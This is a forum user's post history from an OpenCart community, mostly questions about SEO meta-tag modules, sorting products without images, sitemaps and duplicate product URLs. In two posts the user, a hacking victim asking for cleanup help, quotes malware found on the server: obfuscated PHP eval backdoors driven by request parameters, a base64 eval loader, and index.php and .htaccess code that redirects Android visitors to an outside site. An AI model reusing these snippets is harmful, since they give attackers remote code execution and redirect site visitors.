Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

sokolov123

Новачок
  
  • Публікації

    32
  • З нами

  • Відвідування

Усі публікації користувача sokolov123

  1. Купил, разбираюсь в мета тегах. Основная задача - на тех товарах, производителях и категориях, что есть применить сео шаблон. Создал поставщика, полей не заполнял, так как все товары уже есть.Применил, сохранил. Вставил в производителей тестовый [m] -это отличный выбор. Рекомендуем. Галку на категории не важно и поставщики все. Выбирал и обновить мета теги и заменить мета теги, но результата не увидел. Подскажите как быть? Обновлено: Очень хочется приступить к работе с модулем. Помогите решить задачу.
  2. Как это реализовать, чтобы я мог удобно удалить или отключить товары без изображений?
  3. Нашел модуль, но он не продается без привязки к домену. Давно бы его купил. с 16:52 он находит все фотки без изображений.
  4. Добрый день. Так понимаю надо написать в этот раздел. Есть часть товаров без фотографии - и хотелось бы в админке отсортировать товары по изображению. У меня все изображения - это ссылки на внешние сайты, на их сервера с изображениями. И вот часто товар пропадает, они убирают фотки и у меня на сайте вместо изображения пустота как бы. Вот подскажите как сделать сортировку изображений в админке на 2 типа - или фотка по ссылке есть и все ок, или ее просто нет. Чтобы как бы сгруппировать все товары без изображений в начало.
  5. Добрый день. Есть часть товаров без фотографии - и хотелось бы в админке отсортировать товары по изображению. Но такой опции нет. Есть много модулей, которые дают возможность отсортировать все поля, кроме поля "изображение". Подскажите может есть вариант как допилить базовый функционал, чтобы была возможность сортировки или подскажите модуль какой??
  6. пароль к админке был простым и его тупо подобрали. Сейчас айболитом чеканул сайт и руками вычищаю эту гадость.
  7. И я так понимаю этот адейт пхп наплодил еще 20 новых файлов в рандомных папках плюс 20 файлов добавил в начало код свой. Вот удаление начальных 2 файлов на работу вроде не влияют, что делать со всеми остальными - может без главного они не будут работать??? Добавленный код: <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q4e2888'])){eval(${$s20}['q4e2888']);}?> А вот новые файлы содержат или: и вот второй тип <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['neb6d80'])) {eval($s21(${$s20}['neb6d80']));}?> Подскажите можно что делают эти 3 типа кода -можно ли его оставить, чтобы вручную не искать по всем папкам??
  8. Просто он рандомно создал 20 файлов и еще в 20 внес изменения. Это надо каждый сайт вручную проверять??? Просто я думал, что есть какой то антивурус на компе, только для серверов, который это может сделать. И подскажите плиз я знаю какой файл был первым - его надо просто удалить сразу и потом уже вычищать последствия ???
  9. Изучал логи, пришел к выводу, что подобрали пароль к админке и залили троян web.shell nah . Я так понимаю это старый какой то троян (его мой есет нод сразу определил). Как мне теперь вылечить сервер - я не знаю. Приходит в голову просто запустить антивирус, который это лечит, но не знаю как это сделать. У меня на сервере несколько однотипных сайтов. Скажите кто и за сколько готов решить вопрос??? Нашел точное место и название файла, который все это хозяйство создает. Наверно это должно помочь.
  10. все модули покупал тут на форуме. Модуль "производители" за день до взлома: https://opencartforum.com/files/file/218-модуль-производители/ Последним за 2 часа до взлома был: https://opencartforum.com/files/file/612-модуль-рекламы-уголок/ Но это модули с форума. Еще была попытка поставить в тоже время скрипт убегающей кнопки - он не с форума, установил его , но кнопка убегать не стала и удалил его. http://mopesoft.ru/threads/ubegajuschaja-knopka.1572/ Плюс у меня были старые опера и файлзилла, ну и еще то что я не учел
  11. А как мне от этого избавиться то, не подскажите?
  12. Заразился похоже вчера под вечер каким то трояном. Разбрасывает по папкам 20 файлов, еще 20 файлов меняет, index.php добавляет код <?php $ua = $_SERVER['HTTP_USER_AGENT']; if(stripos("***$ua",'android') !== false){ header("Location: http://load-app.org/m/?mobile_version=CleanRu"); die(); } ?> В .htaccess вставляет: RewriteEngine on RewriteCond %{HTTP_USER_AGENT} "Android" [NC] RewriteRule ^(.*)$ http://load-app.org/m/?mobile_version=CleanRu [L,R=302] В разбросанных файлах <?php //Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar $wc7d55d8002b="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($wc7d55d8002b( "JHIxOTA0MGNhYjdhMjVmNjUwOGQzNzc5ZTZjZWYwOTBkPSJceDYyIjskYzNjZTQwYTY0OWU0NWRjOTYyYTk0NGE И куча таких символов. Вставки кода <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['ndfbe75'])) {eval($s21(${$s20}['ndfbe75']));}?> При попытке вручную исправить index.php и .htaccess через час опять все восстанавливается(одновременно удалить все файлы не пробовал) Может кто с таким сталкивался или есть кто то знающий кто может помочь!! Ну и предостиречь остальных от вредителя.
  13. У меня фотографии - это ссылки на сторонние сайты и частично со временем фотки оттуда удаляются и у меня в итоге нет фотографии в товарах. Подскажите как вашим модулем можно эти товары отметить и заменить например на какую то фотку с сервера типа "фото будет завтра". Копался у вас в "инструментах" нашел "удалять из товаров пустые фото", но не понял как это работает в моем варианте.
  14. А можно автоматически установить таймер на все товары, и включить его только на карточке товара(без категорий и производителей)? Чтобы не каждый товар править, а сразу на все например 10 процентов скидка и таймер до конца дня(с автообновлением например каждый день в полночь)?
  15. Купил модуль месяца три назад - отлично все работает. 20к товаров генерирует довольно быстро. Хочу уточнить по функционалу модуля. Вот я залил новые товары и надо ли каждый раз вручную генерировать сайтмап или модуль с какой то переодичностью сам это делает??
  16. Причем у меня в категориях отображается все нормально - ссылки на существующие товары. А вот из производителей косячные - с приставкой ?page=
  17. У меня в этом файле catalog/controller/product/manufacturer.php :: ~235 'href' => $this->url->link('product/product', 'product_id=' . $result['product_id'] . $url) я ее пробовал заменить на 'href' => $this->url->link('product/product', 'product_id=' . $result['product_id']) После чего вообще страница с производителями стала пустой.
  18. Если у производителя более 1 страницы товаров, например сайт.ru/производитель?page=2 сайт.ru/производитель?page=3 Все ссылки на товары имеют вид: сайт.ru/товар?page=2 Вместо: сайт.ru/товар Это создает дубли товаров. Установлен модель сео с вкмодом. Интуитивно понимаю, что надо как то поменять файл производителей, но не знаю что там изменить. Подскажите.
  19. Пожалуйста помогите с установкой этого модуля. 5 суток жду, честно сил нет, готов оплатить труды

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.